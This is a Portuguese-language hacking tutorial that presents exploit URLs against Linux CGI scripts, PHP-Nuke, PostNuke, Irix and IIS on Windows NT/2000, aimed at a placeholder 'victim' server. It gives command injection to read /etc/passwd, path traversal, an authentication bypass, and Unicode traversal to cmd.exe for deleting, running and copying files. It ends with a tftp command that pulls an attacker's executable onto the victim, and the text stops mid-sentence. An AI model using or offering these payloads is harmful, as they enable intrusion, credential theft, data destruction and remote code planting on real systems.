Novos Bugs encontrado em Sistemas Operacionais
para você explorar e praticar possíveis invasões.

Bug's no S.O. Linux

Permite Visualizar Pastas e Arquivos.
http://www.vitima.com.br/php/php.exe?c:\boot.ini

(PHF) Pega o arquivo Boot.ini do servidor.
http://www.vitima.com.br/msadc/Samples/SELECTOR/showcode.asp?source=/msadc/Samples/../../../../../boot.ini

(PHF) Este é o método mais simples usado por hackers para descobrir o arquivo passwd de um servidor de Linux. Embora ele não trabalhe em 90% de tempos, é o mais rápido.
http://www.vitima.com.br/cgi-bin/phf?Qalias=x%Oa/bin/cat%20/etc/passwd

(PHP - Nuke) Permite visualizar arquivos arbitrários na máquina. É Capaz de fazer UpLoads. Pode-se fazer um Defacement em Páginas da Web.
http://www.vitima.com.br/admin.php?upload=1&file=config.php&file_name=hacked.txt&wdir=/images/&userfile=config.php&userfile_name=hacked.txt

(PHP - NUKE II) Permite Copiar e Deletar Arquivos, onde só quem tem permissão de fazer isto é o administrador do sistema.
http://www.vitima.com.br/admin/case/case.filemanager.php

(POSTNUKE) Permite que usuários efetuem login com qualquer ID de um usuário conhecido sem fazer autenticação.
http://www.vitima.com.br/article.php?save=1&sid=20&cookieusrtime=160000&user=USERID:encodedstring

Todos os Bug's abaixo pega no servidor o arquivo password, faz um download. (Coloque antes o host ou IP)
/cgi-bin/php.cgi?/etc/passwd
/cgi-bin/test-cgi?/etc/
/cgi-bin/query?%Oa/bin/cat%20/etc/passwd
/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd
/cgi-bin/htmlscript?../../../../etc/passwd
/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd
/cgi-bin/nph-test-cgi?/etc/*
/cgi-bin/echo?%OAcat%20/etc/passwd
/cgi-bin/view-source?../../../../../etc/passwd
/cgi-bin/pfdisplay.cgi?/../../../../etc/passwd

Bug's no S.O. Irix

Pega o Password
http://www.vitima.com.br/cgi-bin/handler/whatever;cat /etc/passwdl?data=Download

Bug's no S.O. Windows

Bug do Unicode encontrados no sistema Windows NT - 2000

Primeiramente você deve utilizar um scaner do tipo Stealth  para saber a vulnerabilidade encontrada no servidor.
Digamos que seja o seguinte: 

No exemplo abaixo você pode visualizar arquivos e pastas numa unidade.
http://200.139.474.172/scripts/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..
%255c/winnt/system32/cmd.exe?/c+dir/a+c:\*.*

Abaixo você pode deletar arquivos
http://200.139.474.172/scripts/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..
%255c/winnt/system32/cmd.exe?/c+del+c:\arquivo.txt

Abaixo você pode executar ou rodar programas
http://200.139.474.172/scripts/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..
%255c/winnt/system32/cmd.exe?/c+c:\winnt\calc.exe

Abaixo você pode renomear arquivos
http://200.139.474.172/scripts/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..
%255c/winnt/system32/cmd.exe?/c+ren+c:\arquivo1.txt+arquivo2.txt

Abaixo você pode ver o versão do sistema operacional
http://200.139.474.172/scripts/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..
%255c/winnt/system32/cmd.exe?/c+ver

Abaixo você pode fazer download de arquivos
http://200.139.474.172/scripts/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..
%255c/winnt/system32/cmd.exe?/c+type/c+c:\winnt\calc.exe

Abaixo você pode criar pastas
http://200.139.474.172/scripts/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..
%255c/winnt/system32/cmd.exe?/c+md+c:\pasta

Abaixo você pode remover pastas
http://200.139.474.172/scripts/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..
%255c/winnt/system32/cmd.exe?/c+rd+c:\pasta

Abaixo você pode copiar arquivos
http://200.139.474.172/scripts/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..
%255c/winnt/system32/cmd.exe?/c+copy+c:\pasta1+c:\pasta2

Abaixo você pode criar arquivos
http://200.139.474.172/scripts/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..
%255c/winnt/system32/cmd.exe?/c+echo+Aqui+você+escreve+seu+texto+>Arquivo.txt

Abaixo você pode fazer Upload's utilizando um programa chamado tftp.exe que deve estar numa pasta compartilhada na sua unidade c:\
Antes de executar o procedimento abaixo, execute o tftp e simplesmente minimize-o.
http://200.139.474.172/scripts/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..
%255c/winnt/system32/cmd.exe?/c+tftp.exe+-i+SEU_IP+get+Arquivo1.exe+c:\Arquivo2.exe
Explicação: Em SEU_IP você deve digitar o número do seu IP (Ex: 200.223.178.97), Para saber seu IP, vá no
Prompt do MS-DOS e digite arp -a   (seu IP é o primeiro da lista, mas abra antes uma página qualquer no navegador).
O parâmetro  -i  fará com que os dados do arquivo1.exe que deverá estar na pasta compartilhada seja transferido de byte em byte.
Arquivo2.exe, é o nome do arquivo que será salvo na máquina da vítima. Certifique-se de que na máquina da vítima o
arquivo cmd.exe esteja no lugar onde deseja colocar o seu arquivo que esta na pasta compartilhada.
A sua pasta compartilhada deve aparecer aquela mãozinha, não coloque